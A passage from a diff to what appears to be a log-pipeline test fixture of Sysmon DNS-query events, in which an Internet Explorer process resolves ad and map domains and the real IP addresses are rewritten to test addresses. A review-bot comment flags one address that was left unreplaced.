Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15674,12 +15498,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -15696,13 +15520,13 @@ "rtb0.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313938185Z", + "ingested": "2021-12-09T13:49:44.739837900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15770,12 +15594,12 @@ "type": "CNAME" }, { - "data": "20.36.236.157", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "network": { 
@@ -15792,13 +15616,13 @@ "dev.virtualearth.net" ], "ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313939535Z", + "ingested": "2021-12-09T13:49:44.739843200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15866,12 +15690,12 @@ "type": "CNAME" }, { - "data": "23.52.161.238", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "network": { 
@@ -15888,13 +15712,13 @@ "t.ssl.ak.dynamic.tiles.virtualearth.net" ], "ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313940922Z", + "ingested": "2021-12-09T13:49:44.739848400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15954,11 +15778,11 @@ }, "answers": [ { - "data": "74.217.253.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -15966,7 +15790,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -15974,7 +15798,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -15982,7 +15806,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -15990,7 +15814,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -15998,23 +15822,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -16029,24 +15853,24 @@ "rp.gwallet.com" ], "ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313942226Z", + "ingested": "2021-12-09T13:49:44.739854300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16110,7 +15934,7 @@ "type": "CNAME" }, { - "data": "98.139.225.43", + "data": "89.160.20.156", "type": "A" }, { @@ -16118,19 +15942,19 @@ "type": "A" }, { - "data": "72.30.3.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.155.194.56", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "98.139.225.43", + "89.160.20.156", "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -16146,16 +15970,14 @@ "ads.yahoo.com" ], "ip": [ - "98.139.225.43", - "98.138.49.44", - "72.30.3.43", - "216.155.194.56" + "89.160.20.156", + "98.138.49.44" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313943490Z", + "ingested": "2021-12-09T13:49:44.739860100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16222,22 +16044,22 @@ }, "answers": [ { - "data": "169.55.104.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.60.66.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "169.61.103.241", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
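Review bot: The ads.yahoo.com record still carries the real public address `98.138.49.44` in `answers`, `resolved_ip`, the related `ip` list and the `QueryResults` string, while its three sibling A records were rewritten to `89.160.20.156`. If that address is not in the set of test addresses the pipeline's geo lookup is expected to resolve, this one answer keeps the environment-dependent enrichment the change is meant to remove and will be the first line to drift when the expected file is regenerated elsewhere. Replacing it with the same documented address (or another from the supported set) would make the fixture consistent with the rest of the commit; the data also shows the related `ip` list deduplicating `89.160.20.156` while `resolved_ip` keeps every copy, which is worth a one-line note in the test's README so the asymmetry is not mistaken for a bug.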
@@ -16252,15 +16074,13 @@ "um.simpli.fi" ], "ip": [ - "169.55.104.49", - "169.60.66.35", - "169.61.103.241" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313945089Z", + "ingested": "2021-12-09T13:49:44.739866Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData 